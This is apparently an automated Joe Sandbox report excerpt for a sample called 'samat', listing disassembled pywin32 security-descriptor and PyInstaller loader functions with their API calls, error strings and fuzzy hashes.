Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DescriptorSecurityfree$Err_OwnerString$Arg_DaclGroupLengthParseSaclTupleValid
String ID: Oi:SetSecurityDescriptorOwner$SetSecurityDescriptorOwner$The object is not a PySID object
API String ID: 965136164-2833774516
Opcode ID: 7271bdf78a4c65457abcfe2ff72261ddf3eb67bcd4a8f1aaaa12165b7929d36e
Instruction ID: 7818bf3ef79bb6a6104a734010ae116276f2facd7d8e9c7ecd61fcc13f9d2628
Opcode Fuzzy Hash: 7271bdf78a4c65457abcfe2ff72261ddf3eb67bcd4a8f1aaaa12165b7929d36e
Instruction Fuzzy Hash: EB51F922A29B5299FB549FA9D8402BD23A1BF44FC8F894432EF0E57A65DE3CE445C340

Function 00007FF8B7E81F50 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 124COMMON

Download Yara Rule

APIs

PyTuple_New.PYTHON313 ref: 00007FF8B7E81FB8
PyArg_ParseTupleAndKeywords.PYTHON313 ref: 00007FF8B7E82006
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8201E
PyErr_SetString.PYTHON313 ref: 00007FF8B7E82041
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E82133

Strings

The object is not a PySID object, xrefs: 00007FF8B7E820FA
TrusteeForm not yet supported, xrefs: 00007FF8B7E82092
Identifier must be PySID object when TrusteeForm = TRUSTEE_IS_SID, xrefs: 00007FF8B7E8210A
Trustee must be a dictionary containing {MultipleTrustee,MultipleTrusteeOperation,TrusteeForm,TrusteeType,Identifier}, xrefs: 00007FF8B7E82037
Identifier must be string/unicode when TrusteeForm = TRUSTEE_IS_NAME, xrefs: 00007FF8B7E820C2
llO|Ol, xrefs: 00007FF8B7E81FF2
Invalid value for TrusteeForm, xrefs: 00007FF8B7E82073

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Dealloc$Arg_Err_KeywordsParseStringTupleTuple_
String ID: Identifier must be PySID object when TrusteeForm = TRUSTEE_IS_SID$Identifier must be string/unicode when TrusteeForm = TRUSTEE_IS_NAME$Invalid value for TrusteeForm$The object is not a PySID object$Trustee must be a dictionary containing {MultipleTrustee,MultipleTrusteeOperation,TrusteeForm,TrusteeType,Identifier}$TrusteeForm not yet supported$llO|Ol
API String ID: 959004690-581804069
Opcode ID: e030765481a492b5f1dc0f46928bb67b82f3b6325f49a21945abdc45f2321e45
Instruction ID: fa083cc5395260203b5663d012317e0e506eb01f8f58f607961cdd9fb5727abc
Opcode Fuzzy Hash: e030765481a492b5f1dc0f46928bb67b82f3b6325f49a21945abdc45f2321e45
Instruction Fuzzy Hash: 1051F472A08B4286EA208F59E84416D73A8FF88BD4F948035DB9E87B75DF3CE655C700

Function 00007FF8B7E8D170 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

PyLong_AsVoidPtr.PYTHON313 ref: 00007FF8B7E8D19B
PyErr_Occurred.PYTHON313 ref: 00007FF8B7E8D1B2
PyErr_Clear.PYTHON313 ref: 00007FF8B7E8D1C1
PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E8D1DC
PyMem_Free.PYTHON313 ref: 00007FF8B7E8D1EE
PyMem_Free.PYTHON313 ref: 00007FF8B7E8D21C
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E8D23E
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8D25E
PyObject_GetBuffer.PYTHON313 ref: 00007FF8B7E8D270
PyBuffer_Release.PYTHON313 ref: 00007FF8B7E8D291
PyErr_Format.PYTHON313 ref: 00007FF8B7E8D2AB
PyErr_Clear.PYTHON313 ref: 00007FF8B7E8D2D9
PyErr_Format.PYTHON313 ref: 00007FF8B7E8D309

Strings

Buffer cannot be None, xrefs: 00007FF8B7E8D254
WPARAM must be a unicode string, int, or buffer object (got %s), xrefs: 00007FF8B7E8D2F4
Buffer length can be at most %d characters, xrefs: 00007FF8B7E8D29E

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Buffer_ClearFormatFreeMem_ReleaseString$BufferCharLong_Object_OccurredUnicode_VoidWide
String ID: Buffer cannot be None$Buffer length can be at most %d characters$WPARAM must be a unicode string, int, or buffer object (got %s)
API String ID: 3109676845-3026970096
Opcode ID: 638ec2c64d05b181e127cebc01ccb3966a1312f7bc25013f476e672dd9a6040d
Instruction ID: a3943cdff9f4d925f6103daa20b5f2c2c26e7f3233dab9104f94796961764fb4
Opcode Fuzzy Hash: 638ec2c64d05b181e127cebc01ccb3966a1312f7bc25013f476e672dd9a6040d
Instruction Fuzzy Hash: E651E522A09B4296EB55CFADE54423C63A1FF48FC4F884031EB4E476A9DF3CE8959310

Function 00007FF8B7E82150 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON313 ref: 00007FF8B7E82188
PyErr_SetString.PYTHON313 ref: 00007FF8B7E821AF
PyUnicode_FromWideChar.PYTHON313 ref: 00007FF8B7E821FB
Py_BuildValue.PYTHON313 ref: 00007FF8B7E822F5

Strings

TrusteeForm not yet supported, xrefs: 00007FF8B7E821A5
MultipleTrusteeOperation, xrefs: 00007FF8B7E822AC
MultipleTrustee, xrefs: 00007FF8B7E822B8
Identifier, xrefs: 00007FF8B7E822A0
TrusteeType, xrefs: 00007FF8B7E822CD
TrusteeForm, xrefs: 00007FF8B7E822E0
Invalid value for TrusteeForm, xrefs: 00007FF8B7E8217E
{s:O,s:l,s:l,s:l,s:N}, xrefs: 00007FF8B7E822C2

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_String$BuildCharFromUnicode_ValueWide
String ID: Identifier$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}
API String ID: 2305401427-1816636059
Opcode ID: 11424eade5fed42f9f58899388f0ccfc8f6636113c6dcc90c7ab34a3f4ba7640
Instruction ID: a5fff0cc59e3d41e2cdb1383eb2f07474321698189b58c79b0ca2549228c35f9
Opcode Fuzzy Hash: 11424eade5fed42f9f58899388f0ccfc8f6636113c6dcc90c7ab34a3f4ba7640
Instruction Fuzzy Hash: 17412636A08B4286EA608B6DE84026D73A4FF88FD4F944231DB5D87779DF3CE5958740

Function 00007FF8B7E896D0 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 113COMMON

Download Yara Rule

APIs

IsValidSid.ADVAPI32 ref: 00007FF8B7E896E6
GetSidIdentifierAuthority.ADVAPI32 ref: 00007FF8B7E89706
GetSidSubAuthorityCount.ADVAPI32 ref: 00007FF8B7E89712
SetLastError.KERNEL32 ref: 00007FF8B7E89737

Strings

S-%lu-, xrefs: 00007FF8B7E8974F
%lu, xrefs: 00007FF8B7E897A2
-%lu, xrefs: 00007FF8B7E8985F
0x%02hx%02hx%02hx%02hx%02hx%02hx, xrefs: 00007FF8B7E897F3

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Authority$CountErrorIdentifierLastValid
String ID: %lu$-%lu$0x%02hx%02hx%02hx%02hx%02hx%02hx$S-%lu-
API String ID: 228009767-531523367
Opcode ID: d6c7cb6490dbf970e67454a7506a052b5853455ff350a4c329918d20f5ccb460
Instruction ID: 33b7cbe538dc5107a52868d75ef3ec67c067a2902caadf3f294de8b32edf3d7d
Opcode Fuzzy Hash: d6c7cb6490dbf970e67454a7506a052b5853455ff350a4c329918d20f5ccb460
Instruction Fuzzy Hash: 67516D63A0879282E7508B59A8542BE7BA0FB85FC5F444135EF8E43765DE3DD448DB00

Function 00007FF8B7E8ABB0 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

PyBytes_Size.PYTHON313 ref: 00007FF8B7E8ABE7
PyBytes_AsString.PYTHON313 ref: 00007FF8B7E8ABF3
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8AC20
CoTaskMemAlloc.OLE32 ref: 00007FF8B7E8AC35
MultiByteToWideChar.KERNEL32 ref: 00007FF8B7E8AC5C
PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E8AC7B
CoTaskMemAlloc.OLE32 ref: 00007FF8B7E8AC9B
memcpy.VCRUNTIME140 ref: 00007FF8B7E8ACB4
PyMem_Free.PYTHON313 ref: 00007FF8B7E8ACC3
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8ACF3
PyErr_Format.PYTHON313 ref: 00007FF8B7E8AD1E

Strings

<NULL!!>, xrefs: 00007FF8B7E8AD06
value is larger than a DWORD, xrefs: 00007FF8B7E8AC16
Objects of type '%s' can not be converted to Unicode., xrefs: 00007FF8B7E8AD14
None is not a valid string in this context, xrefs: 00007FF8B7E8ACE9

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: String$Err_$AllocBytes_CharTaskWide$ByteFormatFreeMem_MultiSizeUnicode_memcpy
String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
API String ID: 1531658785-4125661472
Opcode ID: 3347bce25c09ebf94e70747036ae54bb500433f39d5cdda55fb947e0f7a70fe8
Instruction ID: 0d8e8787e8fa56a6a996d747ab7f503705774b4f348cdd83a153a14d64f456e8
Opcode Fuzzy Hash: 3347bce25c09ebf94e70747036ae54bb500433f39d5cdda55fb947e0f7a70fe8
Instruction Fuzzy Hash: 6941D622A0DB4686FA548F5AE44426D63A1BF89FC5F984635EB4E437B6DF3CE444C300

Function 00007FF8B7E8AA10 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

PyBytes_Size.PYTHON313 ref: 00007FF8B7E8AA45
PyBytes_AsString.PYTHON313 ref: 00007FF8B7E8AA51
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8AA7E
CoTaskMemAlloc.OLE32 ref: 00007FF8B7E8AA93
MultiByteToWideChar.KERNEL32 ref: 00007FF8B7E8AABA
PyUnicode_AsWideCharString.PYTHON313 ref: 00007FF8B7E8AAD9
CoTaskMemAlloc.OLE32 ref: 00007FF8B7E8AAF9
memcpy.VCRUNTIME140 ref: 00007FF8B7E8AB12
PyMem_Free.PYTHON313 ref: 00007FF8B7E8AB21
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8AB51
PyErr_Format.PYTHON313 ref: 00007FF8B7E8AB7C

Strings

<NULL!!>, xrefs: 00007FF8B7E8AB64
value is larger than a DWORD, xrefs: 00007FF8B7E8AA74
Objects of type '%s' can not be converted to Unicode., xrefs: 00007FF8B7E8AB72
None is not a valid string in this context, xrefs: 00007FF8B7E8AB47

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: String$Err_$AllocBytes_CharTaskWide$ByteFormatFreeMem_MultiSizeUnicode_memcpy
String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
API String ID: 1531658785-4125661472
Opcode ID: 168a535267c4d2021b12235baa8610be014cf2e5a84bacd634d05af756321a3e
Instruction ID: e8dbe3799d1a0621776342bf9a6fc08b642c13bb1a0c8346d4a8f63e056c2e53
Opcode Fuzzy Hash: 168a535267c4d2021b12235baa8610be014cf2e5a84bacd634d05af756321a3e
Instruction Fuzzy Hash: F541D222A0DB4282FA50CB9EE44427D63A1BF89FD4F884635EB4E577A6DF3CE4048340

Function 00007FF8B7E81DD0 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

PyMapping_Check.PYTHON313 ref: 00007FF8B7E81DFB
PyErr_SetString.PYTHON313 ref: 00007FF8B7E81E16
PyMapping_Items.PYTHON313 ref: 00007FF8B7E81E2C
PyDict_New.PYTHON313 ref: 00007FF8B7E81E43
PySequence_Size.PYTHON313 ref: 00007FF8B7E81E5F
PySequence_GetItem.PYTHON313 ref: 00007FF8B7E81E77
PyTuple_GetItem.PYTHON313 ref: 00007FF8B7E81E88
PyTuple_GetItem.PYTHON313 ref: 00007FF8B7E81E96
PyDict_SetItem.PYTHON313 ref: 00007FF8B7E81EA5
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E81EB9
PySequence_Size.PYTHON313 ref: 00007FF8B7E81EC7
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E81EEA
PyErr_Clear.PYTHON313 ref: 00007FF8B7E81F03

Strings

__dict__, xrefs: 00007FF8B7E81F09
Object must be a mapping (dictionary, class instance, etc, xrefs: 00007FF8B7E81E0C

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Item$Sequence_$DeallocDict_Err_Mapping_SizeTuple_$CheckClearItemsString
String ID: Object must be a mapping (dictionary, class instance, etc$__dict__
API String ID: 581612630-910247860
Opcode ID: 5d4b3b7ce0b7b16c71f8fdb79b69360d59f5c68d73fa31168451f9c5b6ef5398
Instruction ID: 3c541e246e33bde319878d9907548fa9e6f1bf12c6c6387a504c094668bbf4f1
Opcode Fuzzy Hash: 5d4b3b7ce0b7b16c71f8fdb79b69360d59f5c68d73fa31168451f9c5b6ef5398
Instruction Fuzzy Hash: A731E922E09B4686FB548FAEA84422D63A1EF49FD5F485035EF4E86775DF3CE4858700

Function 00007FF8B7E83030 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 162COMMON

Download Yara Rule

APIs

PyErr_Format.PYTHON313 ref: 00007FF8B7E830A6
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8310D
GetLastError.KERNEL32 ref: 00007FF8B7E83174
GetLengthSid.ADVAPI32 ref: 00007FF8B7E83190
PyErr_Format.PYTHON313 ref: 00007FF8B7E831BB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E831CB
PyErr_Format.PYTHON313 ref: 00007FF8B7E831F0
memset.VCRUNTIME140 ref: 00007FF8B7E83203
memcpy.VCRUNTIME140 ref: 00007FF8B7E83213
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E83278

Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA

Strings

The object is not a PySID object, xrefs: 00007FF8B7E83103
%s: unable to allocated %d bytes, xrefs: 00007FF8B7E831E0
%s not supported by this version of Windows, xrefs: 00007FF8B7E8309C
%s: adding ACE would put ACL over size limit, xrefs: 00007FF8B7E831AE

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Err_$Format$ErrorLast$BuildDecodeFreeLengthLocalMessageObjectStringUnicode_Valuefreemallocmemcpymemset
String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$The object is not a PySID object
API String ID: 2123223808-1709335586
Opcode ID: 23f19527f0bff15d9e74990f0f1674cade0e525a7b8c2d2658d9cfa4f814197a
Instruction ID: c33c787613645983017adab3205b400e2bbd0567a6525e011aeda1a40a60c0fc
Opcode Fuzzy Hash: 23f19527f0bff15d9e74990f0f1674cade0e525a7b8c2d2658d9cfa4f814197a
Instruction Fuzzy Hash: 42610B26B0CB4281FA609B5AA85167E63A1BF89FC4F944435EF4D47BB6EF3CE4458700

Function 00007FF7E12C81D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF7E12C86B7,?,?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C822C

Part of subcall function 00007FF7E12C2810: MessageBoxW.USER32 ref: 00007FF7E12C28EA

Strings

CreateDirectory, xrefs: 00007FF7E12C837C
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7E12C82D9
\, xrefs: 00007FF7E12C8261
%.*s, xrefs: 00007FF7E12C830C
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7E12C8240
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF7E12C829D
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF7E12C8373
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7E12C8203

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
Instruction ID: 2cc97a808fae56afa4ee59e3e19a0f94149b729cb8c39f9f790c874412a0d512
Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
Instruction Fuzzy Hash: 9C51A311B1868281FB51BB20EC573BAE259AF94780FC59433DB0E836D5EEBCE544C362

Function 00007FF8B7E8CC60 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 52COMMON

Download Yara Rule

APIs

PyLong_FromUnsignedLongLong.PYTHON313 ref: 00007FF8B7E8CC7F
PyLong_FromUnsignedLongLong.PYTHON313 ref: 00007FF8B7E8CC8C
PyLong_FromUnsignedLongLong.PYTHON313 ref: 00007FF8B7E8CC99
PyLong_FromUnsignedLongLong.PYTHON313 ref: 00007FF8B7E8CCA6
PyLong_FromUnsignedLongLong.PYTHON313 ref: 00007FF8B7E8CCB3
PyLong_FromUnsignedLongLong.PYTHON313 ref: 00007FF8B7E8CCBF
Py_BuildValue.PYTHON313 ref: 00007FF8B7E8CD26

Strings

WriteTransferCount, xrefs: 00007FF8B7E8CCF3
ReadTransferCount, xrefs: 00007FF8B7E8CCFF
ReadOperationCount, xrefs: 00007FF8B7E8CCD4
{s:N,s:N,s:N,s:N,s:N,s:N}, xrefs: 00007FF8B7E8CCE7
OtherOperationCount, xrefs: 00007FF8B7E8CD10
WriteOperationCount, xrefs: 00007FF8B7E8CCCA
OtherTransferCount, xrefs: 00007FF8B7E8CCDB

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Long$FromLong_Unsigned$BuildValue
String ID: OtherOperationCount$OtherTransferCount$ReadOperationCount$ReadTransferCount$WriteOperationCount$WriteTransferCount${s:N,s:N,s:N,s:N,s:N,s:N}
API String ID: 3891383402-408589094
Opcode ID: 4ee5e6750fb859370a58b46a6f2f982fc0eabf7e348b4551c1477cedafe3e123
Instruction ID: 2d05e8069ec70994356cee73f1be1c00f4cbdf20f08c3d29ea626671d958ce0c
Opcode Fuzzy Hash: 4ee5e6750fb859370a58b46a6f2f982fc0eabf7e348b4551c1477cedafe3e123
Instruction Fuzzy Hash: 7021A436A09B4296D710CB89F84846973A4FB88FD1B550236EE9D43728EF7CD555C740

Function 00007FF7E12C1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to write data chunk!, xrefs: 00007FF7E12C17CA
fopen, xrefs: 00007FF7E12C1663
fwrite, xrefs: 00007FF7E12C17D1
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7E12C17DF
malloc, xrefs: 00007FF7E12C1749
Failed to extract %s: failed to open target file!, xrefs: 00007FF7E12C165C
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7E12C16A2
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7E12C16DA
fread, xrefs: 00007FF7E12C17E6
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF7E12C1742
Failed to create symbolic link %s!, xrefs: 00007FF7E12C1622
fseek, xrefs: 00007FF7E12C16E1

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: c5839bb019746ec98c3466aa841b6b43dea5a335c893380da7bbb784120de0b7
Instruction ID: 30411cdfb76d1865e385ef329db9a896927d2b266610695e4e2daec76b7fc569
Opcode Fuzzy Hash: c5839bb019746ec98c3466aa841b6b43dea5a335c893380da7bbb784120de0b7
Instruction Fuzzy Hash: FD51AE21B0864386EB15BB119C033AAA358BF84794FD44533EE4C47BA6DFBDE544D722

